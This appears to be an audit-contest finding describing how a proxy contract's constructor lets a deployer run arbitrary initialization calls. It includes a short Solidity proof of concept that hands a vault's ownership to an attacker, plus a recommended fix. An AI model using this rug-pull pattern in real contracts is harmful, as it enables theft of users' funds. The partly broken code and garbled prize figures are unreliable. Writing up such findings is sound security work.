Submission Details
Severity:
[H-6] Arbitrary Initialization Payloads Allow Deployer Rug-Pull
Summary
The InitParams struct allows the deployer to execute arbitrary code during contract creation, enabling instant protocol destruction.
Vulnerability Details
Affected Code:
constructor(InitParams memory initRootUpgrade) {
rootUpgrade.upgrade(
initRootUpgrade.initBranches,
initRootUpgrade.initializables, // Arbitrary addresses
initRootUpgrade.initializePayloads // Arbitrary calldata
);
}
Proof of Concept:
// Malicious Deployer Script
address attacker = 0xBADBAD...;
address[] memory targets = new address[]();
targets[0] = address(vault);
bytes[] memory payloads = new bytes[]();
payloads[0] = abi.encodeWithSignature("transferOwnership(address)", attacker);
RootProxy.InitParams memory params = RootProxy.InitParams({
initBranches: legitimateBranches,
initializables: targets,
initializePayloads: payloads
});
new RootProxy(params); // Ownership transferred to attacker
Exploit Validation:
Deploy with malicious params
Check vault owner: console.log(vault.owner())
Result: 0xBADBAD... (attacker address)
Impact
Immediate Admin Hijacking: Attacker gains protocol control at deployment.
Self-Destruct: Deployer can pass selfdestruct payloads.
Tools Used
Foundry Test: Simulated deployer rug-pull:
Recommendations
// Restrict initializables to known contracts
require(
initializables[i] == address(vault) ||
initializables[i] == address(oracle),
"Unauthorized initialization"
);
Prize pool breakdown
Total prize
70,000 USDC
nSLOC
3,25821 USDC / LOC
66,500
3,500
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.